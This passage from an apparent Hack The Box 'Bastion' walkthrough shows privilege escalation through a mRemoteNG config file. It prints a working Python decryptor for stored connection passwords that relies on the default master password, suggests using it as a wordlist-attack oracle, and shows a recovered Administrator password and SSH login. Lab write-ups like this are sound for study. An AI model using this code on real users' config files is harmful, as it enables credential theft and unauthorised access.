<Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEn
The Password attribute is not merely encoded: it is the Administrator connection password encrypted with AES-GCM under the master password (the default one, since none was set), with the salt, nonce and authentication tag packed into the same base64 blob: Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
A decryption script is available at https://raw.githubusercontent.com/kmahyyg/mremoteng-decrypt/master/mremoteng_decrypt.py; it assumes the default master password unless told otherwise. Usage:
╰─$ python mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw== 130 ↵
Password: thXLHM96BeKL0ER2
╭─kali@kali ~/HTB/bastion
╰─$
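To see why the script works rather than treating it as a black box, the format is worth spelling out. The following is an added example and is not the page's or the mremoteng-decrypt project's code: it splits the Password attribute into salt, nonce, ciphertext and GCM tag, derives the key with PBKDF2-HMAC-SHA1 using the KdfIterations declared in the file, and decrypts with AES-256-GCM using the salt as associated data. It assumes the default master password mR3m (the value mRemoteNG 1.76 uses when none was set, and the one the script above relies on) and needs either pycryptodome or the cryptography package. The XML snippet is constructed from the confCons.xml above with the trailing display attributes dropped, since they play no part in the encryption.

```python
import base64
import hashlib
import xml.etree.ElementTree as ET

# mRemoteNG 1.76.x: Password = base64(salt[16] | nonce[16] | ciphertext | tag[16]).
# key = PBKDF2-HMAC-SHA1(master password, salt, KdfIterations, 32 bytes); AES-256-GCM, AAD = salt.
# With no user-set master password the client uses this hard-coded default.
DEFAULT_MASTER_PASSWORD = "mR3m"

# Constructed from the confCons.xml shown above (root element plus the DC node, trimmed).
CONFCONS_SNIPPET = b"""<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
  <Node Name="DC" Type="Connection" Descr="" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" Port="3389" />
</mrng:Connections>
"""


def _aes_gcm_decrypt(key: bytes, nonce: bytes, ciphertext: bytes, tag: bytes, aad: bytes) -> bytes:
    """Use pycryptodome if present, otherwise fall back to the cryptography package."""
    try:
        from Crypto.Cipher import AES
    except ImportError:
        from cryptography.hazmat.primitives.ciphers.aead import AESGCM
        return AESGCM(key).decrypt(nonce, ciphertext + tag, aad)
    cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
    cipher.update(aad)
    return cipher.decrypt_and_verify(ciphertext, tag)


def decrypt_mremoteng_password(b64_blob: str, master_password: str = DEFAULT_MASTER_PASSWORD,
                               kdf_iterations: int = 1000) -> str:
    blob = base64.b64decode(b64_blob)
    if len(blob) < 48:
        raise ValueError("blob too short to hold salt, nonce and tag")
    salt, nonce, ciphertext, tag = blob[:16], blob[16:32], blob[32:-16], blob[-16:]
    key = hashlib.pbkdf2_hmac("sha1", master_password.encode("utf-8"), salt, kdf_iterations, dklen=32)
    try:
        plaintext = _aes_gcm_decrypt(key, nonce, ciphertext, tag, salt)
    except ImportError:
        raise
    except Exception as exc:  # pycryptodome raises ValueError, cryptography raises InvalidTag
        raise ValueError("GCM tag check failed: wrong master password or corrupted blob") from exc
    return plaintext.decode("utf-8")


def extract_connections(confcons_xml: bytes, master_password: str = DEFAULT_MASTER_PASSWORD) -> list:
    """Walk every Connection node and decrypt its password with the KDF settings the file declares."""
    root = ET.fromstring(confcons_xml)
    iterations = int(root.get("KdfIterations", "1000"))
    found = []
    for node in root.iter("Node"):
        if node.get("Type") != "Connection" or not node.get("Password"):
            continue
        found.append({
            "name": node.get("Name"),
            "target": "%s:%s/%s" % (node.get("Hostname"), node.get("Port"), node.get("Protocol")),
            "username": node.get("Username"),
            "password": decrypt_mremoteng_password(node.get("Password"), master_password, iterations),
        })
    return found


if __name__ == "__main__":
    for conn in extract_connections(CONFCONS_SNIPPET):
        print(conn)
```

A wrong master password fails the GCM tag check instead of producing garbage, so the same function doubles as an oracle for a wordlist attack on a confCons.xml whose owner did set a custom master password; only 1000 PBKDF2 iterations stand in the way of that.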
Logging in over SSH as Administrator with the recovered password:
╰─$ ssh [email protected]
[email protected]'s password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>whoami
bastion\administrator
administrator@BASTION C:\Users\Administrator>